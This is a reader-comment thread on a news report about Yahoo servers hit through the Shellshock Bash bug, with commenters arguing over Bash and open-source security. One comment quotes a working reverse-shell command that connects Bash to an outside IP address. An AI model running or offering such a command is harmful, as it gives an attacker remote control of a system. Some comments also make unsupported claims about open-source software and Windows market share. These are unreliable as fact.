living under a rock
"As soon as we became aware of the issue, we began patching our systems and have been closely monitoring our network," a Yahoo! spokesperson told The Register in an emailed statement.
It's even been on the BBC, ffs.
Yahoo! said "a handful" of its servers fell to hackers who may have been trying to exploit the Shellshock vulnerability in Bash. The miscreants took control of the web servers to build a botnet out of them, it is claimed. "As soon as we became aware of the issue, we began patching our systems and have been closely monitoring …
Why in the world Bash isn't deleted from any Internet-facing system, I have no idea. If you look at John Hall's code, it's Bash itself that's making a connection back to Hall's servers. I can imagine that a complete evil server system could be hidden in Bash environmental variables. A "minimal system" should be exactly that, with minimal functionality.
Amazingly, a tool is being used as a tool.
Even in a "minimal system" the tools to do maintenance must still be available from time to time. Unless we are talking embedded.
Whether "Bash is Bollocks for security" is neither here nor there.
The error here consists in making the Swiss army knife usable from outside. That is a combination of using shell scripts to process the "Agent" header and having that bash bug. The error does not consist in having the Swiss army knife available in the first place.
"/bin/bash -i >&/dev/tcp/199.175.52.92/2221 0>&1" does not do a whole lot. Would it work with any other shell on a system which has nice features underneath /dev/tcp? I sure hope so.
Why use shell scripts to process that "Agent" header? Well, now, that is the REAL question. They should have been gotten rid of some time ago.
"Bash is Bollocks"? It's not just Bash, the entire F/OSS eco-system is riddled with failure. Need I mention Heartbleed? They tout the "many eyes" myth, but as no one actually looks the bugs go unfound.
F/OSS is based on the communist hippy idea that life is all love and cuddles. It isn't. Life is hard and there are assholes at every turn. If you are deploying new servers and you want something that will actually work, for the sake of your security do not deploy F/OSS.
There is a very good reason Windows is the dominant OS in the server room (circa 75%), dominant on the desktop (circa 90%) and taking ground for all comers on mobile.